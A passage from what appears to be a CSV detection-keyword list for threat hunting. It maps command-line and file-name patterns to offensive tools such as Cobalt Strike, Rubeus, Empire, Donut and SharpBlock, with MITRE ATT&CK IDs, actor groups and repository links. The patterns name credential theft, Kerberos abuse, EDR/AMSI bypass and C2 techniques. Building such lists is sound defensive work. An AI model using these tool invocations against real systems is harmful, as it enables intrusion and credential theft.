deploy_cobalt_beacon*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,0,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z
-* DesertFox.go,offensive_tool_keyword,cobaltstrike,Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/zha0gongz1/DesertFox,1,0,N/A,10,10,123,26,2023-02-02T07:02:12Z,2021-02-04T09:04:13Z
-* -DestHost * -DestPort 5555 -UseDefaultProxy*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,0,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z
-* detect-hooks.c 
*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/Detect-Hooks,1,0,N/A,10,10,138,28,2021-07-22T20:13:16Z,2021-07-22T18:58:23Z
-* dhcp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* diagrun=true service=DNS* dllpath=*.dll* computername=*,offensive_tool_keyword,PerfExec,PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.,T1055.001 - T1059.001 - T1059.003 - T1027.002,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/PerfExec,1,0,N/A,7,1,73,8,2023-08-02T20:53:24Z,2023-07-11T16:43:47Z
-* diamond * /certificate:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z
-* diamond /tgtdeleg *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z
-* diamond /user:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z
-* dicom-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* dicom-ping.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* dict-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* DInvokeResolver.*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z
-* dir /s */ Microsoft.ActiveDirectory.Management.dll*,greyware_tool_keyword,dir,threat actors searched for Active Directory related DLLs in directories,T1059 - T1083 - T1018,A0002 - TA0009 - TA0040,N/A,N/A,Discovery,https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* --dirnames bank financ payable payment reconcil remit voucher vendor eft swift *,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z
-* dirty.c*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1533,TA0003,N/A,N/A,Exploitation tools,https://github.com/FireFart/dirtycow,1,0,N/A,N/A,8,767,437,2021-04-08T11:35:12Z,2016-11-25T21:08:01Z
-* dirtycow.c *,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/timwr/CVE-2016-5195,1,0,N/A,N/A,10,935,404,2021-02-03T16:03:40Z,2016-10-21T11:19:21Z
-* Dirty-Pipe.*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/bbaranoff/CVE-2022-0847,1,0,N/A,N/A,1,49,25,2022-03-07T15:52:23Z,2022-03-07T15:50:18Z
-* Dirty-Pipe.sh*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/puckiestyle/CVE-2022-0847,1,0,N/A,N/A,1,1,1,2022-03-10T08:10:40Z,2022-03-08T14:46:21Z
-* --disable-bypass-amsi*,offensive_tool_keyword,SharpBlock,A method of bypassing EDR active projection DLL by preventing entry point exection,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CCob/SharpBlock,1,0,N/A,10,10,975,147,2021-03-31T09:44:48Z,2020-06-14T10:32:16Z
-* --disable-bypass-cmdline*,offensive_tool_keyword,SharpBlock,A method of bypassing EDR active projection DLL by preventing entry point exection,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CCob/SharpBlock,1,0,N/A,10,10,975,147,2021-03-31T09:44:48Z,2020-06-14T10:32:16Z
-* --disable-bypass-etw*,offensive_tool_keyword,SharpBlock,A method of bypassing EDR active projection DLL by preventing entry point exection,T1070.004 - 
T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CCob/SharpBlock,1,0,N/A,10,10,975,147,2021-03-31T09:44:48Z,2020-06-14T10:32:16Z
-* DisableETW(*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z
-* DisableWLDP(*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z
-* distcc-cve2004-2687.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* --dll * --only *AmsiScanBuffer*AmsiScanString*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z
-* --dll * --payload *,offensive_tool_keyword,SharpDllProxy,Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading,T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002,TA0002 - TA0003 - TA0004,N/A,N/A,Defense Evasion,https://github.com/Flangvik/SharpDllProxy,1,0,N/A,N/A,6,565,76,2020-07-21T17:14:01Z,2020-07-12T10:46:48Z
-* --dll C:\Windows\System32\version.dll*--dll C:\Windows\System32\userenv.dll*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z
-* --dll --dllhijack *,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,,
-* -DllName * -FunctionName *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-BypassUACTokenManipulation.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-* -dns_stager_prepend *,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,0,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z
-* -dns_stager_subhost *,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,0,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z
-* dns-blacklist.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* dns-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* dns-cache-snoop.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* dnscan.py*,offensive_tool_keyword,dnscan,dnscan is a python wordlist-based DNS subdomain scanner.,T1595 - T1595.002 - T1018 - T1046,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://github.com/rbsec/dnscan,1,0,N/A,6,10,984,413,2022-08-09T11:11:31Z,2013-03-13T10:42:07Z
-* dns-check-zone.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* dns-client-subnet-scan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dns-fuzz.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dns-ip6-arpa-scan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dnslog-cn.nse*,offensive_tool_keyword,nmap,Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Diverto/nse-log4shell,1,0,N/A,N/A,4,347,51,2021-12-20T15:34:21Z,2021-12-12T22:52:02Z -* dns-nsec3-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dns-nsec-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dns-nsid.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dns-random-srcport.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dns-random-txid.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dns-recursion.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dns-service-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dns-srv-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -dns-tcp -nameserver * -dc-ip*,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -* dns-update.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dns-zeustracker.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dns-zone-transfer.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* docker-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -domain * /dc * /service cifs /ptt*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/ricardojba/noPac,1,0,N/A,N/A,1,34,5,2021-12-19T17:42:12Z,2021-12-13T18:51:31Z -* --domain * --kerberos*,offensive_tool_keyword,gMSADumper,Lists who can read any gMSA password blobs and parses them if the current user has access.,T1552.001 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/micahvandeusen/gMSADumper,1,0,N/A,N/A,2,190,34,2023-08-23T13:32:49Z,2021-04-10T00:15:24Z -* -Domain * -SMB1 *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 